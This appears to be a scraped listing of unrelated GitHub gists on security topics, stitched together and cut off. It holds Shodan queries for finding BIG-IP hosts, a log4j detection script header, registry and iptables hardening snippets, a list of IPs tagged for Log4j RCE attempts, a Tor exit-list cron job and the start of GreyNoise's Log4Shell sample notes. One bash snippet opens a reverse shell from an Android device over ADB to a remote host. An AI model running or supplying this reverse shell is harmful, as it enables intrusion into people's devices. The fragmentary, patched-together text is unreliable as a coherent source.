title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python3 | |
''' | |
Needs Requests (pip3 install requests) | |
Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options] | |
"DontUpdateLinks"=dword:00000001 | |
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options] | |
"DontUpdateLinks"=dword:00000001 | |
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options] | |
"DontUpdateLinks"=dword:00000001 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import os | |
shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"] | |
for ip in shodan: | |
os.system("iptables -A INPUT -s {} -j DROP".format(ip)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ip | tag_name | |
---|---|---|
162.155.56.106 | Apache Log4j RCE Attempt | |
223.111.180.119 | Apache Log4j RCE Attempt | |
213.142.150.93 | Apache Log4j RCE Attempt | |
211.154.194.21 | Apache Log4j RCE Attempt | |
210.6.176.90 | Apache Log4j RCE Attempt | |
199.244.51.112 | Apache Log4j RCE Attempt | |
199.101.171.39 | Apache Log4j RCE Attempt | |
197.246.175.186 | Apache Log4j RCE Attempt | |
196.196.150.38 | Apache Log4j RCE Attempt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##Get New Exit Node list ever 6 Hours | |
57 */6 * * * `curl https://check.torproject.org/cgi-bin/TorBulkExitList.py\?ip\=<yourip> | awk '{print $0" TOREX;"}' > /etc/nginx/includes/torexit.ips && service nginx restart` |
Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
The follow section includes Log4Shell samples seen in the wild
What appears to be a failed attempt: